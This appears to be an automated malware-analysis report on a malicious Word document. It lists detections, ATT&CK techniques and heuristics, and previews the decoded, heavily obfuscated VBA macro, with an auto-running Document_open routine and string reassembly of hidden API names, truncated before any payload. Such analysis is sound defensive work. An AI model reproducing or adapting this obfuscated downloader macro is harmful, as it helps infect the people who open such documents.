MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and uses 'CreateObject' with obfuscated API names, specifically reassembling 'winmgmts'. This indicates an attempt to download and execute a second-stage payload, as suggested by the ClamAV detection 'Doc.Downloader.Generic-7449733-0'. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7449733-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7449733-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8844 bytes |
SHA-256: 86cf2cdbc4444da9a610e2fd388814581912dff627abc89422cd2c19c4ece2d9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Czifdgkef"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Ndnmkruqzbb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Mtxpbxxkup
Case Wwhqxgwfnywx
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Xkdtlkfcbal)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Cfrknshsumold
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Xnxakmzmh)
End Select
Select Case Oqxwgesrlbf
Case Aqpdrarvowk
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Tmrnhbnupcv)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Csmoxxoptp
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Folsaumdq)
End Select
Select Case Kgswnfdwptmn
Case Ggfrzmczclwh
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Kamsafoislg)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Udykrasfzff
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Sldhzfrpl)
End Select
Schszmscvkoqo
End Sub
Attribute VB_Name = "Ooyeqwvsbbtx"
Attribute VB_Base = "0{0F296782-B55F-4FBF-9E82-7CD051B2AD19}{EF8D03C2-A674-41FF-B7DD-50CD79DEFCA6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fjrcykmrq"
Function Fpejzqoqwwcg()
Select Case Lmjcmfercy
Case Vpflekohel
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Lkkvvnlgzk)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Koqnyqguiqkzf
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Zmteakarc)
End Select
Dcaskaka = Czifdgkef.Ndnmkruqzbb
Select Case Rfiwpsllzkjx
Case Efcwnfwvzd
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Jbviewatpwjho)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ftvzwlcwz
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Zmxwgfhr)
End Select
Aoegnkuv = Dcaskaka + Ooyeqwvsbbtx.Inoahnejc + Ooyeqwvsbbtx.Uoqqmorshteiw + Ooyeqwvsbbtx.Kberhegak
Select Case Firapzodlqjs
Case Lwrihwnvh
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Funkwscobp)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ibadnjvzigsdu
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Rtfkbunjf)
End Select
Mebtkohizear = Aoegnkuv + Ooyeqwvsbbtx.Xoynuikmsbj + Ooyeqwvsbbtx.Dmzjhztg.ControlTipText
Select Case Oauqfdhl
Case Lqblutoorbdj
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Yiaqjxduj)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Wpghsndhufqpe
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Ylesaecmr)
End Select
Fpejzqoqwwcg = Ltadlxhhcxll + Mebtkohizear + Ltadlxhhcxll
Select Case Gsbhnjmo
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.